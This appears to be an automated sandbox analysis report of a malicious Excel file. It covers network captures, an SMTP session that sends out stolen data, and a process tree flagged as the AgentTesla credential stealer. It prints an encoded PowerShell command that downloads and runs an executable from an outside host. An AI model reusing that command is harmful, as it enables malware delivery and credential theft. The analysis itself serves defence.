                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=baoCFihHe3vY%2Fp9N0q%2BQez9i0k5uYbBiwb6SGE57jjPbX0awa6Y%2Fnie%2F5lHlgHEac%2FvsPnKFOE%2BYZoFd3YwfiVagq05LHaMbOu589wfAhyQ7excjCMdpn9A%3D"}],"max_age":604800}
                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                Server: cloudflare
                                                CF-RAY: 634026c95967076e-LHR
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e
                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="precon


                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Mar 22, 2021 15:37:54.724102974 CET58749168198.54.116.63192.168.2.22220-server120.web-hosting.com ESMTP Exim 4.94 #2 Mon, 22 Mar 2021 10:37:54 -0400
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Mar 22, 2021 15:37:54.724512100 CET49168587192.168.2.22198.54.116.63EHLO 226546
                                                Mar 22, 2021 15:37:54.916032076 CET58749168198.54.116.63192.168.2.22250-server120.web-hosting.com Hello 226546 [84.17.52.78]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-X_PIPE_CONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Mar 22, 2021 15:37:54.919426918 CET49168587192.168.2.22198.54.116.63AUTH login bWFpbEBqaXJhdGFuZS5jb20=
                                                Mar 22, 2021 15:37:55.110783100 CET58749168198.54.116.63192.168.2.22334 UGFzc3dvcmQ6
                                                Mar 22, 2021 15:37:55.313492060 CET58749168198.54.116.63192.168.2.22235 Authentication succeeded
                                                Mar 22, 2021 15:37:55.314274073 CET49168587192.168.2.22198.54.116.63MAIL FROM:<mail@jiratane.com>
                                                Mar 22, 2021 15:37:55.505429983 CET58749168198.54.116.63192.168.2.22250 OK
                                                Mar 22, 2021 15:37:55.505986929 CET49168587192.168.2.22198.54.116.63RCPT TO:<root@jiratane.com>
                                                Mar 22, 2021 15:37:55.701775074 CET58749168198.54.116.63192.168.2.22250 Accepted
                                                Mar 22, 2021 15:37:55.702084064 CET49168587192.168.2.22198.54.116.63DATA
                                                Mar 22, 2021 15:37:55.893100023 CET58749168198.54.116.63192.168.2.22354 Enter message, ending with "." on a line by itself
                                                Mar 22, 2021 15:37:55.896759033 CET49168587192.168.2.22198.54.116.63.
                                                Mar 22, 2021 15:37:56.096447945 CET58749168198.54.116.63192.168.2.22250 OK id=1lOLgp-003DOA-QA
                                                Mar 22, 2021 15:40:41.094693899 CET58749168198.54.116.63192.168.2.22421 server120.web-hosting.com: SMTP command timeout - closing connection

                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:15:35:38
                                                Start date:22/03/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f5a0000
                                                File size:27641504 bytes
                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:15:35:40
                                                Start date:22/03/2021
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                                                Imagebase:0x4a410000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:15:35:41
                                                Start date:22/03/2021
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                                                Imagebase:0x13f270000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:15:35:48
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\tNDFx.exe'
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 28%, ReversingLabs
                                                Reputation:low

                                                General

                                                Start time:15:35:56
                                                Start date:22/03/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                Imagebase:0x4a720000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:15:35:57
                                                Start date:22/03/2021
                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                Wow64 process (32bit):true
                                                Commandline:timeout 1
                                                Imagebase:0x390000
                                                File size:27136 bytes
                                                MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:15:35:58
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Start time:15:35:59
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                Disassembly

                                                Code Analysis

                                                Reset < >